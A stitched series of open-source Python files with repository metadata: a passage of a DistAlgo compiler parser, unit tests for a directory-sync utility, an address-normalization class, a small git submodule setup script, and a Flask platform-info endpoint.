# some(EVENT_PATTERN in rcvd | PRED).
expr = self.create_expr(dast.DomainSpec, node)
event = self.parse_event_expr(node, literal=False)
if event is not None:
event.record_history = True
expr.pattern = self.pattern_from_event(event)
if node.func.id == KW_RECV_QUERY:
expr.domain = self.create_expr(dast.ReceivedExpr, node)
else:
expr.domain = self.create_expr(dast.SentExpr, node)
expr.domain.event = event
self.pop_state()
self.pop_state()
return expr
elif (isinstance(node, Compare) and len(node.ops) == 1 and
type(node.ops[0]) is In):
expr = self.create_expr(dast.DomainSpec, node)
self.current_context = Assignment()
expr.pattern = self.parse_pattern_expr(node.left)
self.current_context = IterRead(expr.pattern)
expr.domain = self.visit(node.comparators[0])
self.pop_state()
return expr
elif isinstance(node, comprehension) or isinstance(node, For):
expr = self.create_expr(dast.DomainSpec, node)
self.current_context = Assignment()
if self.enable_iterator_pattern:
expr.pattern = self.parse_pattern_expr(node.target)
else:
expr.pattern = self.visit(node.target)
self.current_context = IterRead(expr.pattern)
expr.domain = self.visit(node.iter)
if isinstance(expr.domain, dast.HistoryExpr):
expr.pattern = self.pattern_from_event(expr.domain.event)
self.pop_state()
return expr
else:
raise MalformedStatementError("malformed domain specifier.")
def parse_quantified_expr(self, node):
if node.func.id == KW_EXISTENTIAL_QUANT:
context = dast.ExistentialOp
elif node.func.id == KW_UNIVERSAL_QUANT:
context = dast.UniversalOp
else:
raise MalformedStatementError("Unknown quantifier.")
expr = self.create_expr(dast.QuantifiedExpr, node, {'op': context})
self.enter_query()
try:
expr.domains, predicates = self.parse_domains_and_predicate(node)
if len(predicates) > 1:
self.warn("Multiple predicates in quantified expression, "
"first one is used, the rest are ignored.", node)
expr.predicate = predicates[0]
finally:
self.leave_query(node)
self.pop_state()
return expr
def parse_comprehension(self, node):
if node.func.id == KW_COMP_SET:
expr_type = dast.SetCompExpr
elif node.func.id == KW_COMP_LIST:
expr_type = dast.ListCompExpr
elif node.func.id == KW_COMP_DICT:
expr_type = dast.DictCompExpr
        elif node.func.id == KW_COMP_TUPLE:
            expr_type = dast.TupleCompExpr
        else:
            raise MalformedStatementError("Unknown comprehension type.")
expr = self.create_expr(expr_type, node)
self.enter_query()
first_arg = node.args[0]
node.args = node.args[1:]
try:
expr.domains, expr.conditions = self.parse_domains_and_predicate(node)
if expr_type is dast.DictCompExpr:
if not (isinstance(first_arg, Tuple) and
len(first_arg.elts) == 2):
self.error("Malformed element in dict comprehension.",
first_arg)
else:
kv = dast.KeyValue(expr)
                    kv.key = self.visit(first_arg.elts[0])
                    kv.value = self.visit(first_arg.elts[1])
expr.elem = kv
else:
expr.elem = self.visit(first_arg)
finally:
self.leave_query(node)
self.pop_state()
return expr
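    # Surface form accepted by parse_comprehension, schematically (the
    # concrete keyword spellings are the KW_COMP_* and KW_SUCH_THAT
    # constants defined earlier in this module):
    #
    #   <comp_kw>(ELEM, DOMAIN_1, ..., DOMAIN_n, <such_that_kw>=PRED)
    #
    # ELEM is the first positional argument, every remaining positional
    # argument is a domain handled by parse_domain_spec, and PRED defaults
    # to True when omitted (see parse_domains_and_predicate).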
def audit_query(self, expr, node):
self.debug("auditing " + str(expr), node)
self.debug("...freevars: " + str(expr.freevars), node)
self.debug("...boundvars: " + str(expr.boundvars), node)
intersect = {v.name for v in expr.ordered_freevars} & \
{v.name for v in expr.ordered_boundvars}
if intersect:
msg = ("query variables " +
" ".join(["'" + n + "'" for n in intersect]) +
" are both free and bound.")
self.error(msg, node)
def parse_aggregates(self, node):
if node.func.id == KW_AGGREGATE_SUM:
expr_type = dast.SumExpr
elif node.func.id == KW_AGGREGATE_SIZE:
expr_type = dast.SizeExpr
elif node.func.id == KW_AGGREGATE_MIN:
expr_type = dast.MinExpr
        elif node.func.id == KW_AGGREGATE_MAX:
            expr_type = dast.MaxExpr
        else:
            raise MalformedStatementError("Unknown aggregate operator.")
expr = self.create_expr(expr_type, node)
first_arg = node.args[0]
node.args = node.args[1:]
try:
expr.domains, expr.conditions = self.parse_domains_and_predicate(node)
expr.elem = self.visit(first_arg)
finally:
self.pop_state()
return expr
def parse_domains_and_predicate(self, node):
preds = []
# Find predicate:
for kw in node.keywords:
if kw.arg == KW_SUCH_THAT:
preds.append(kw.value)
else:
self.error("Unknown keyword '%s' in comprehension expression." %
kw.arg, node)
# ..if no predicate found, then default to True:
if len(preds) == 0:
            preds = [NameConstant(True)]
domains = node.args
if len(domains) == 0:
self.warn("No domain specifiers in comprehension expression.", node)
        dadomains = [self.parse_domain_spec(dom) for dom in domains]
self.current_context = Read()
dapredicates = [self.visit(pred) for pred in preds]
return dadomains, dapredicates
def parse_config_section(self, node):
res = []
for kw in node.keywords:
key = kw.arg
vnode = kw.value
value = None
if isinstance(vnode, Name):
value = vnode.id
elif isinstance(vnode, Num):
value = vnode.n
elif isinstance(vnode, Str) or isinstance(vnode, Bytes):
value = vnode.s
elif isinstance(vnode, NameConstant):
value = vnode.value
else:
self.error("Invalid configuration value.", vnode)
if value is not None:
res.append((key, value))
return res
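    # Schematically, a source-level configuration call such as
    # config(key1=SomeName, key2=42, key3='s') -- keyword spelling per this
    # module's KW_* constants -- is flattened into
    # [('key1', 'SomeName'), ('key2', 42), ('key3', 's')]; only names,
    # numbers, strings, bytes, and True/False/None literals are accepted
    # as values.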
def visit_Call(self, node):
if self.call_check(Quantifiers, 1, None, node):
try:
return self.parse_quantified_expr(node)
except MalformedStatementError as e:
self.error("Malformed quantification expression: " + str(e),
node)
return dast.SimpleExpr(self.current_parent, node)
if self.call_check(ComprehensionTypes, 2, None, node):
try:
return self.parse_comprehension(node)
except MalformedStatementError as e:
self.error("Malformed comprehension expression: " + str(e),
node)
return dast.SimpleExpr(self.current_parent, node)
if (self.current_process is not None and
self.call_check({KW_RECV_QUERY, KW_SENT_QUERY}, 1, 1, node)):
if isinstance(self.current_context, IterRead):
if node.func.id == KW_RECV_QUERY:
expr = self.create_expr(dast.ReceivedExpr, node)
else:
expr = self.create_expr(dast.SentExpr, node)
expr.context = self.current_context.type
expr.event = self.parse_event_expr(
node, literal=(not self.enable_iterator_pattern))
self.pop_state()
if expr.event is not None:
expr.event.record_history = True
return expr
else:
outer = self.create_expr(dast.ComparisonExpr, node)
outer.comparator = dast.InOp
if node.func.id == KW_RECV_QUERY:
expr = self.create_expr(dast.ReceivedExpr, node)
else:
expr = self.create_expr(dast.SentExpr, node)
if self.current_context is not None:
expr.context = self.current_context.type
event = self.parse_event_expr(
node, literal=(not self.enable_membertest_pattern))
self.pop_state()
expr.event = event
outer.right = expr
if event is not None:
outer.left = self.pattern_from_event(
event, literal=(not self.enable_membertest_pattern))
event.record_history = True
self.pop_state()
return outer
if self.call_check(ApiMethods, None, None, node):
self.debug("Api method call: " + node.func.id, node)
expr = self.create_expr(dast.ApiCallExpr, node)
expr.func = node.func.id
elif self.call_check(BuiltinMethods, None, None, node):
self.debug("Builtin method call: " + node.func.id, node)
expr = self.create_expr(dast.BuiltinCallExpr, node)
expr.func = node.func.id
else:
if isinstance(node.func, Name):
self.debug("Method call: " + str(node.func.id), node)
expr = self.create_expr(dast.CallExpr, node)
self.current_context = FunCall()
expr.func = self.visit(node.func)
self.current_context = Read()
expr.args = [self.visit(a) for a in node.args]
expr.keywords = [(kw.arg, self.visit(kw.value))
for kw in node.keywords]
expr.starargs = self.visit(node.starargs) \
if node.starargs is not None else None
expr.kwargs = self.visit(node.kwargs) \
if node.kwargs is not None else None
self.pop_state()
return expr
def visit_Name(self, node):
if node.id in {KW_TRUE, KW_FALSE, KW_NULL}:
if type(self.current_context) in {Assignment, Update, Delete}:
self.warn("Constant expression in update context.", node)
if node.id == KW_TRUE:
return self.create_expr(dast.TrueExpr, node, nopush=True)
elif node.id == KW_FALSE:
return self.create_expr(dast.FalseExpr, node, nopush=True)
elif node.id == KW_NULL:
return self.create_expr(dast.NoneExpr, node, nopush=True)
if self.current_process is not None and node.id == KW_SELF:
return self.create_expr(dast.SelfExpr, node, nopush=True)
if (self.current_process is not None and
(node.id in {KW_RECV_QUERY, KW_SENT_QUERY})):
if node.id == KW_RECV_QUERY:
expr = self.create_expr(dast.ReceivedExpr, node)
event_type = dast.ReceivedEvent
else:
expr = self.create_expr(dast.SentExpr, node)
event_type = dast.SentEvent
if (isinstance(self.current_context, Read) and
isinstance(self.current_context.type, dast.PatternExpr)):
expr.context = self.current_context.type
event = self.event_from_pattern(expr.context, event_type)
expr.event = event
event.record_history = True
else:
self.error("Invalid context for '%s'" % node.id, node)
self.pop_state()
return expr
# NamedVar is not by itself an Expression, we'll have to wrap it in a
# SimpleExpr:
expr = self.create_expr(dast.SimpleExpr, node)
if isinstance(self.current_context, Assignment):
n = self.current_scope.find_name(node.id, local=False)
if n is None:
self.debug("Adding name %s to %s" % (node.id,
self.current_scope), node)
n = self.current_scope.add_name(node.id)
n.add_assignment(expr)
elif isinstance(self.current_context, Update) or\
isinstance(self.current_context, Delete):
n = self.current_scope.find_name(node.id, local=False)
if n is None:
self.warn("Possible use of uninitialized variable '%s'" %
node.id, node)
self.debug(str(self.current_scope.parent_scope), node)
n = self.current_scope.add_name(node.id)
n.add_update(expr)
elif isinstance(self.current_context, Read) or \
isinstance(self.current_context, FunCall):
n = self.current_scope.find_name(node.id, local=False)
if n is None:
self.warn("Possible use of uninitialized variable '%s'" %
node.id, node)
self.debug(str(self.current_scope.parent_scope), node)
if self.current_scope.parent_scope is not None:
self.debug(self.current_scope.parent_scope._names, node)
else:
self.debug(self.current_scope._names, node)
n = self.current_scope.add_name(node.id)
n.add_read(expr)
expr.value = n
self.pop_state()
return expr
def visit_Str(self, node):
expr = self.create_expr(dast.ConstantExpr, node)
expr.value = node.s
self.pop_state()
return expr
def visit_Bytes(self, node):
expr = self.create_expr(dast.ConstantExpr, node)
expr.value = node.s
self.pop_state()
return expr
def visit_Num(self, node):
expr = self.create_expr(dast.ConstantExpr, node)
expr.value = node.n
self.pop_state()
return expr
# Since Python 3.4:
def visit_NameConstant(self, node):
        if node.value is True:
            return self.create_expr(dast.TrueExpr, node, nopush=True)
        elif node.value is False:
            return self.create_expr(dast.FalseExpr, node, nopush=True)
        elif node.value is None:
            return self.create_expr(dast.NoneExpr, node, nopush=True)
        else:
            raise NotImplementedError("Unrecognized NameConstant %s." %
                                      repr(node.value))
def visit_Tuple(self, node):
expr = self.create_expr(dast.TupleExpr, node)
for item in node.elts:
expr.subexprs.append(self.visit(item))
self.pop_state()
return expr
def visit_List(self, node):
expr = self.create_expr(dast.ListExpr, node)
for item in node.elts:
expr.subexprs.append(self.visit(item))
self.pop_state()
return expr
def visit_Set(self, node):
expr = self.create_expr(dast.SetExpr, node)
for item in node.elts:
expr.subexprs.append(self.visit(item))
self.pop_state()
return expr
def visit_Dict(self, node):
expr = self.create_expr(dast.DictExpr, node)
for key in node.keys:
expr.keys.append(self.visit(key))
for value in node.values:
expr.values.append(self.visit(value))
self.pop_state()
return expr
def visit_BinOp(self, node):
e = self.create_expr(dast.BinaryExpr, node,
{"op": OperatorMap[type(node.op)]})
e.left = self.visit(node.left)
e.right = self.visit(node.right)
self.pop_state()
return e
def visit_BoolOp(self, node):
e = self.create_expr(dast.LogicalExpr, node,
{"op": OperatorMap[type(node.op)]})
for v in node.values:
e.subexprs.append(self.visit(v))
self.pop_state()
return e
def visit_Compare(self, node):
if len(node.ops) > 1:
self.error("Explicit parenthesis required in comparison expression",
node)
return None
outer = None
# We make all negation explicit:
if type(node.ops[0]) in NegatedOperators:
outer = self.create_expr(dast.LogicalExpr, node)
outer.operator = dast.NotOp
expr = self.create_expr(dast.ComparisonExpr, node)
if self.enable_membertest_pattern:
# DistAlgo: overload "in" to allow pattern matching
if isinstance(node.ops[0], In) or \
isinstance(node.ops[0], NotIn):
# Backward compatibility: only assume pattern if containing free
# var
pf = PatternFinder()
pf.visit(node.left)
if pf.found:
expr.left = self.parse_pattern_expr(node.left)
if expr.left is None:
expr.left = self.visit(node.left)
self.current_context = Read(expr.left)
expr.right = self.visit(node.comparators[0])
if (isinstance(expr.right, dast.HistoryExpr) and
expr.right.event is not None):
# Must replace short pattern format with full pattern here:
expr.left = self.pattern_from_event(expr.right.event)
if outer is not None:
expr.comparator = NegatedOperators[type(node.ops[0])]
outer.subexprs.append(expr)
self.pop_state()
self.pop_state()
return outer
else:
expr.comparator = OperatorMap[type(node.ops[0])]
self.pop_state()
return expr
def visit_UnaryOp(self, node):
if type(node.op) is Not:
expr = self.create_expr(dast.LogicalExpr, node, {"op": dast.NotOp})
expr.subexprs.append(self.visit(node.operand))
else:
expr = self.create_expr(dast.UnaryExpr, node,
{"op": OperatorMap[type(node.op)]})
expr.right = self.visit(node.operand)
self.pop_state()
return expr
def visit_Subscript(self, node):
expr = self.create_expr(dast.SubscriptExpr, node)
expr.value = self.visit(node.value)
self.current_context = Read()
expr.index = self.visit(node.slice)
self.pop_state()
return expr
def visit_Index(self, node):
return self.visit(node.value)
def visit_Slice(self, node):
expr = self.create_expr(dast.SliceExpr, node)
if node.lower is not None:
expr.lower = self.visit(node.lower)
if node.upper is not None:
expr.upper = self.visit(node.upper)
if node.step is not None:
expr.step = self.visit(node.step)
self.pop_state()
return expr
def visit_ExtSlice(self, node):
self.warn("ExtSlice in subscript not supported.", node)
        return self.create_expr(dast.PythonExpr, node, nopush=True)
def visit_Yield(self, node):
        # Should not get here: 'yield' statements should have been handled by
# visit_Expr
self.error("unexpected 'yield' expression.", node)
return self.create_expr(dast.PythonExpr, node, nopush=True)
def visit_YieldFrom(self, node):
# Should not get here: 'yield from' statements should have been
        # handled by visit_Expr
self.error("unexpected 'yield from' expression.", node)
return self.create_expr(dast.PythonExpr, node, nopush=True)
def visit_Lambda(self, node):
expr = self.create_expr(dast.LambdaExpr, node)
self.signature(node.args)
expr.body = self.visit(node.body)
self.pop_state()
return expr
def visit_Ellipsis(self, node):
return self.create_expr(dast.EllipsisExpr, node, nopush=True)
def generator_visit(self, node):
if isinstance(node, SetComp):
expr = self.create_expr(dast.SetCompExpr, node)
elif isinstance(node, ListComp):
expr = self.create_expr(dast.ListCompExpr, node)
elif isinstance(node, DictComp):
expr = self.create_expr(dast.DictCompExpr, node)
else:
expr = self.create_expr(dast.GeneratorExpr, node)
for g in node.generators:
expr.unlock()
self.current_context = Assignment()
# DistAlgo: overload 'in' to allow pattern matching:
expr.domains.append(self.parse_domain_spec(g))
expr.lock()
self.current_context = Read()
expr.conditions.extend([self.visit(i) for i in g.ifs])
if isinstance(node, DictComp):
kv = dast.KeyValue(expr)
kv.key = self.visit(node.key)
kv.value = self.visit(node.value)
expr.elem = kv
else:
expr.elem = self.visit(node.elt)
self.pop_state()
return expr
visit_ListComp = generator_visit
visit_GeneratorExp = generator_visit
visit_SetComp = generator_visit
visit_DictComp = generator_visit
del generator_visit
def visit_IfExp(self, node):
expr = self.create_expr(dast.IfExpr, node)
expr.condition = self.visit(node.test)
expr.body = self.visit(node.body)
expr.orbody = self.visit(node.orelse)
self.pop_state()
return expr
def visit_Starred(self, node):
expr = self.create_expr(dast.StarredExpr, node)
expr.value = self.visit(node.value)
self.pop_state()
return expr
# Helper Nodes
def error(self, mesg, node):
self.errcnt += 1
if node is not None:
printe(mesg, node.lineno, node.col_offset, self.filename)
else:
printe(mesg, 0, 0, self.filename)
def warn(self, mesg, node):
self.warncnt += 1
if node is not None:
printw(mesg, node.lineno, node.col_offset, self.filename)
else:
printw(mesg, 0, 0, self.filename)
def debug(self, mesg, node=None):
if node is not None:
printd(mesg, node.lineno, node.col_offset, self.filename)
else:
printd(mesg, 0, 0, self.filename)
if __name__ == "__main__":
pass
|
mayli/DistAlgo
|
da/compiler/parser.py
|
Python
|
mit
| 75,023
|
__author__ = 'diegoj'
|
intelligenia/modeltranslation
|
modeltranslation/admin/__init__.py
|
Python
|
mit
| 22
|
#!/usr/bin/env python
# vim: set fdm=marker:
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
import os.path
import unittest
import tempdir
from .. import smart_dir_copy
__version__ = '0.1'
class Test_SmartDirCopy01(unittest.TestCase):
def test01(self):
with tempdir.TempDir() as td:
os.mkdir(os.path.join(td, 'source'))
with open(os.path.join(td, 'source', 'foo.txt'), 'wb'):
pass
os.mkdir(os.path.join(td, 'dest'))
smart_dir_copy.smart_dir_sync(
os.path.join(td, 'source'),
os.path.join(td, 'dest')
)
self.assertSequenceEqual(
('foo.txt',),
os.listdir(os.path.join(td, 'dest'))
)
self.assertEqual(
int(os.path.getmtime(os.path.join(td, 'source', 'foo.txt'))),
int(os.path.getmtime(os.path.join(td, 'dest', 'foo.txt')))
)
def test02(self):
with tempdir.TempDir() as td:
os.mkdir(os.path.join(td, 'source'))
with open(os.path.join(td, 'source', 'foo.txt'), 'wb'):
pass
with open(os.path.join(td, 'source', 'bar.txt'), 'wb'):
pass
os.mkdir(os.path.join(td, 'dest'))
smart_dir_copy.smart_dir_sync(
os.path.join(td, 'source'),
os.path.join(td, 'dest')
)
self.assertItemsEqual(
('foo.txt', 'bar.txt'),
os.listdir(os.path.join(td, 'dest'))
)
self.assertEqual(
int(os.path.getmtime(os.path.join(td, 'source', 'foo.txt'))),
int(os.path.getmtime(os.path.join(td, 'dest', 'foo.txt')))
)
self.assertEqual(
int(os.path.getmtime(os.path.join(td, 'source', 'bar.txt'))),
int(os.path.getmtime(os.path.join(td, 'dest', 'bar.txt')))
)
def test_no_update_necessary(self):
with tempdir.TempDir() as td:
# {{{
###################################################################
# Set up the source directory.
os.mkdir(os.path.join(td, 'source'))
with open(os.path.join(td, 'source', 'foo.txt'), 'wb') as w:
w.write('abc')
os.utime(
os.path.join(td, 'source', 'foo.txt'),
(1473656261, 1473656261)
)
with open(os.path.join(td, 'source', 'bar.txt'), 'wb') as w:
w.write('def')
os.utime(
os.path.join(td, 'source', 'bar.txt'),
(1473656261 + 1, 1473656261 + 1)
)
os.mkdir(os.path.join(td, 'source', 'alpha'))
with open(
os.path.join(td, 'source', 'alpha', 'foo1.txt'), 'wb'
) as w:
w.write('ghi')
os.utime(
os.path.join(td, 'source', 'alpha', 'foo1.txt'),
(1473656261 + 2, 1473656261 + 2)
)
with open(
os.path.join(td, 'source', 'alpha', 'bar2.txt'), 'wb'
) as w:
w.write('jkl')
os.utime(
os.path.join(td, 'source', 'alpha', 'bar2.txt'),
(1473656261 + 3, 1473656261 + 3)
)
#
###################################################################
# }}}
# {{{
###################################################################
# Set up the dest directory.
os.mkdir(os.path.join(td, 'dest'))
with open(os.path.join(td, 'dest', 'foo.txt'), 'wb') as w:
w.write('123')
os.utime(
os.path.join(td, 'dest', 'foo.txt'),
(1473656261, 1473656261)
)
with open(os.path.join(td, 'dest', 'bar.txt'), 'wb') as w:
w.write('456')
os.utime(
os.path.join(td, 'dest', 'bar.txt'),
(1473656261 + 1, 1473656261 + 1)
)
os.mkdir(os.path.join(td, 'dest', 'alpha'))
with open(
os.path.join(td, 'dest', 'alpha', 'foo1.txt'), 'wb'
) as w:
w.write('789')
os.utime(
os.path.join(td, 'dest', 'alpha', 'foo1.txt'),
(1473656261 + 2, 1473656261 + 2)
)
with open(
os.path.join(td, 'dest', 'alpha', 'bar2.txt'), 'wb'
) as w:
w.write('012')
os.utime(
os.path.join(td, 'dest', 'alpha', 'bar2.txt'),
(1473656261 + 3, 1473656261 + 3)
)
#
###################################################################
# }}}
smart_dir_copy.smart_dir_sync(
os.path.join(td, 'source'),
os.path.join(td, 'dest')
)
for tpl in (
('foo.txt', 'abc'),
('bar.txt', 'def')
):
with open(os.path.join(td, 'source', tpl[0]), 'rb') as r:
self.assertEqual(
tpl[1],
r.read()
)
for tpl in (
('foo1.txt', 'ghi'),
('bar2.txt', 'jkl')
):
with open(
os.path.join(td, 'source', 'alpha', tpl[0]), 'rb'
) as r:
self.assertEqual(
tpl[1],
r.read()
)
for tpl in (
('foo.txt', '123'),
('bar.txt', '456')
):
with open(os.path.join(td, 'dest', tpl[0]), 'rb') as r:
self.assertEqual(
tpl[1],
r.read()
)
for tpl in (
('foo1.txt', '789'),
('bar2.txt', '012')
):
with open(
os.path.join(td, 'dest', 'alpha', tpl[0]), 'rb'
) as r:
self.assertEqual(
tpl[1],
r.read()
)
def test_03(self):
with tempdir.TempDir() as td:
# {{{
###################################################################
# Set up the source directory.
os.mkdir(os.path.join(td, 'source'))
with open(os.path.join(td, 'source', 'foo.txt'), 'wb'):
pass
with open(os.path.join(td, 'source', 'bar.txt'), 'wb'):
pass
os.mkdir(os.path.join(td, 'source', 'alpha'))
with open(os.path.join(td, 'source', 'alpha', 'foo1.txt'), 'wb'):
pass
with open(os.path.join(td, 'source', 'alpha', 'bar2.txt'), 'wb'):
pass
#
###################################################################
# }}}
os.mkdir(os.path.join(td, 'dest'))
smart_dir_copy.smart_dir_sync(
os.path.join(td, 'source'),
os.path.join(td, 'dest')
)
self.assertItemsEqual(
('foo.txt', 'bar.txt', 'alpha'),
os.listdir(os.path.join(td, 'dest'))
)
self.assertEqual(
int(os.path.getmtime(os.path.join(td, 'source', 'foo.txt'))),
int(os.path.getmtime(os.path.join(td, 'dest', 'foo.txt')))
)
self.assertEqual(
int(os.path.getmtime(os.path.join(td, 'source', 'bar.txt'))),
int(os.path.getmtime(os.path.join(td, 'dest', 'bar.txt')))
)
self.assertItemsEqual(
('foo1.txt', 'bar2.txt'),
os.listdir(os.path.join(td, 'dest', 'alpha'))
)
self.assertEqual(
int(os.path.getmtime(os.path.join(td, 'source', 'alpha', 'foo1.txt'))),
int(os.path.getmtime(os.path.join(td, 'dest', 'alpha', 'foo1.txt')))
)
self.assertEqual(
int(os.path.getmtime(os.path.join(td, 'source', 'alpha', 'bar2.txt'))),
int(os.path.getmtime(os.path.join(td, 'dest', 'alpha', 'bar2.txt')))
)
def test_differentFileContentsSameMtime(self):
with tempdir.TempDir() as td:
# {{{
###################################################################
# Set up the source directory.
os.mkdir(os.path.join(td, 'source'))
with open(os.path.join(td, 'source', 'foo.txt'), 'wb') as w:
w.write('abc')
os.utime(
os.path.join(td, 'source', 'foo.txt'),
(1473656261, 1473656261)
)
with open(os.path.join(td, 'source', 'bar.txt'), 'wb') as w:
w.write('def')
os.utime(
os.path.join(td, 'source', 'bar.txt'),
(1473656261 + 1, 1473656261 + 1)
)
os.mkdir(os.path.join(td, 'source', 'alpha'))
with open(
os.path.join(td, 'source', 'alpha', 'foo1.txt'), 'wb'
) as w:
w.write('ghi')
os.utime(
os.path.join(td, 'source', 'alpha', 'foo1.txt'),
(1473656261 + 2, 1473656261 + 2)
)
with open(
os.path.join(td, 'source', 'alpha', 'bar2.txt'), 'wb'
) as w:
w.write('jkl')
os.utime(
os.path.join(td, 'source', 'alpha', 'bar2.txt'),
(1473656261 + 3, 1473656261 + 3)
)
#
###################################################################
# }}}
# {{{
###################################################################
# Set up the dest directory.
os.mkdir(os.path.join(td, 'dest'))
#
# We set up a dest file that has the same mtime as the src file,
# but a different file size.
with open(os.path.join(td, 'dest', 'foo.txt'), 'wb') as w:
w.write('12')
os.utime(
os.path.join(td, 'dest', 'foo.txt'),
(1473656261, 1473656261)
)
#
with open(os.path.join(td, 'dest', 'bar.txt'), 'wb') as w:
w.write('456')
os.utime(
os.path.join(td, 'dest', 'bar.txt'),
(1473656261 + 1, 1473656261 + 1)
)
#
os.mkdir(os.path.join(td, 'dest', 'alpha'))
with open(
os.path.join(td, 'dest', 'alpha', 'foo1.txt'), 'wb'
) as w:
w.write('789')
os.utime(
os.path.join(td, 'dest', 'alpha', 'foo1.txt'),
(1473656261 + 2, 1473656261 + 2)
)
with open(
os.path.join(td, 'dest', 'alpha', 'bar2.txt'), 'wb'
) as w:
w.write('012')
os.utime(
os.path.join(td, 'dest', 'alpha', 'bar2.txt'),
(1473656261 + 3, 1473656261 + 3)
)
#
###################################################################
# }}}
smart_dir_copy.smart_dir_sync(
os.path.join(td, 'source'),
os.path.join(td, 'dest')
)
for tpl in (
('foo.txt', 'abc'),
('bar.txt', 'def')
):
with open(os.path.join(td, 'source', tpl[0]), 'rb') as r:
self.assertEqual(
tpl[1],
r.read()
)
for tpl in (
('foo1.txt', 'ghi'),
('bar2.txt', 'jkl')
):
with open(
os.path.join(td, 'source', 'alpha', tpl[0]), 'rb'
) as r:
self.assertEqual(
tpl[1],
r.read()
)
for tpl in (
('foo.txt', 'abc'),
('bar.txt', '456')
):
with open(os.path.join(td, 'dest', tpl[0]), 'rb') as r:
self.assertEqual(
tpl[1],
r.read()
)
for tpl in (
('foo1.txt', '789'),
('bar2.txt', '012')
):
with open(
os.path.join(td, 'dest', 'alpha', tpl[0]), 'rb'
) as r:
self.assertEqual(
tpl[1],
r.read()
)
class Test_SetMtime(unittest.TestCase):
def test01(self):
new_mtime = 1473652205
with tempdir.TempDir() as td:
with open(os.path.join(td, 'foo.txt'), 'wb'):
pass
smart_dir_copy.set_mtime(os.path.join(td, 'foo.txt'), new_mtime)
self.assertEqual(
new_mtime,
int(os.path.getmtime(os.path.join(td, 'foo.txt')))
)
if __name__ == '__main__':
unittest.main()
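# The copy heuristic these tests pin down, as a minimal sketch (an assumed
# model of smart_dir_copy.smart_dir_sync, not its actual implementation):
#
#     def needs_copy(src, dst):
#         if not os.path.exists(dst):
#             return True
#         same_mtime = int(os.path.getmtime(src)) == int(os.path.getmtime(dst))
#         same_size = os.path.getsize(src) == os.path.getsize(dst)
#         return not (same_mtime and same_size)
#
# test_no_update_necessary exercises the "same mtime and size -> skip"
# branch; test_differentFileContentsSameMtime exercises "same mtime but
# different size -> copy".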
|
shalesbridge/steamssdmanager
|
tests/test_smart_dir_copy.py
|
Python
|
mit
| 13,521
|
# coding: UTF-8
'''
Created on Apr 16, 2014
@author: hernan
'''
import re
from usig_normalizador_amba.settings import CALLE_ALTURA, CALLE_Y_CALLE, INVALIDO
from usig_normalizador_amba.Calle import Calle
class Direccion:
    '''
    @ivar calle: street of the address
    @type calle: Calle
    @ivar altura: street number on the street
    @type altura: Integer
    @ivar cruce: cross street
    @type cruce: Calle
    @ivar tipo: type of the address
    @type tipo: {CALLE_ALTURA = 0, CALLE_Y_CALLE = 1}
    @ivar smp: Section-Block-Parcel (Seccion-Manzana-Parcela)
    @type smp: String
    @ivar coordenadas: geocoded coordinates
    @type coordenadas: Punto
    @ivar partido: district (partido) of the address
    @type partido: Partido
    '''
calle = None
altura = 0
cruce = None
tipo = INVALIDO
coordenadas = None
partido = None
localidad = ''
def __init__(self, calle, altura=0, cruce=None):
        '''
        @param calle: street of the address
        @type calle: Calle
        @param altura: street number on the street
        @type altura: Integer
        @param cruce: cross street
        @type cruce: Calle
        '''
        if isinstance(calle, Calle):
            self.calle = calle
            self.partido = calle.partido
            self.localidad = calle.localidad
        else:
            raise TypeError('calle must be a Calle object.')
        self.altura = int(altura)
        if cruce is None or isinstance(cruce, Calle):
            self.cruce = cruce
        else:
            raise TypeError('cruce must be a Calle object.')
        if self.altura > 0:
            self.tipo = CALLE_ALTURA
        elif cruce is not None:
            self.tipo = CALLE_Y_CALLE
        else:
            self.tipo = INVALIDO
def __str__(self):
return self.__unicode__().encode('utf8', 'ignore')
def __unicode__(self):
retval = '''-- Dirección
calle = {0}
altura = {1}
cruce = {2}
coordenadas = {3}
partido = {4}
localidad = {5}'''
return retval.format(self.calle.nombre,
self.altura,
self.cruce.nombre if self.cruce is not None else '',
self.coordenadas,
self.partido.nombre,
self.localidad)
def toString(self):
        '''
        Returns the address as a properly written, display-ready string.
        @return: the address as text
        @rtype: String
        '''
        if self.tipo == CALLE_ALTURA:
            if self.altura > 0:
                altura = self.altura
            else:
                altura = 'S/N'
            retval = '{0} {1}, {2}'.format(self.calle.nombre, altura, self.partido.nombre)
        elif self.tipo == CALLE_Y_CALLE:
            # Spanish conjunction: 'y' becomes 'e' before a word starting
            # with an "i" sound (e.g. "Italia", "Hilario").
            if re.match('(?i)(I|Hi|HI)', self.cruce.nombre) is not None:
                separador = 'e'
            else:
                separador = 'y'
            retval = '{0} {1} {2}, {3}'.format(self.calle.nombre, separador, self.cruce.nombre, self.partido.nombre)
        else:
            retval = ''
        return retval
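# A minimal usage sketch (the Calle instances are hypothetical; the real
# Calle class lives in usig_normalizador_amba.Calle):
#
#     d = Direccion(some_calle, altura=1250)
#     d.tipo        # CALLE_ALTURA, since altura > 0
#     d.toString()  # e.g. 'Corrientes 1250, Vicente Lopez'
#
#     e = Direccion(some_calle, cruce=other_calle)
#     e.tipo        # CALLE_Y_CALLE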
|
usig/normalizador-amba
|
usig_normalizador_amba/Direccion.py
|
Python
|
mit
| 3,273
|
#!/usr/bin/python3
import os
os.system("git submodule init")
os.system("git submodule update")
print("Setup Completed")
|
SadGaming/SadSDLGame
|
scripts/setup.py
|
Python
|
mit
| 120
|
import ld
import os
import sys
from flask_restful import Resource
IS_WIN = os.name == 'nt'
IS_LINUX = sys.platform.startswith('linux')
IS_DARWIN = sys.platform.startswith('darwin')
class Platform(Resource):
    def get(self):
        if IS_LINUX:
            return dict(
                id=ld.id(),
                name=ld.name(),
                version=ld.version(),
                like=ld.like(),
                codename=ld.codename(),
                base=ld.base()
            )
        # The ld probes are Linux-only; report the bare platform name on
        # other hosts instead of implicitly returning None.
        return dict(id=sys.platform)
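# Typical wiring, for illustration only (the real application setup lives
# elsewhere in roomservice):
#
#     from flask import Flask
#     from flask_restful import Api
#
#     app = Flask(__name__)
#     api = Api(app)
#     api.add_resource(Platform, '/system/platform')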
|
natict/roomservice
|
roomservice/system/platform.py
|
Python
|
mit
| 491
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
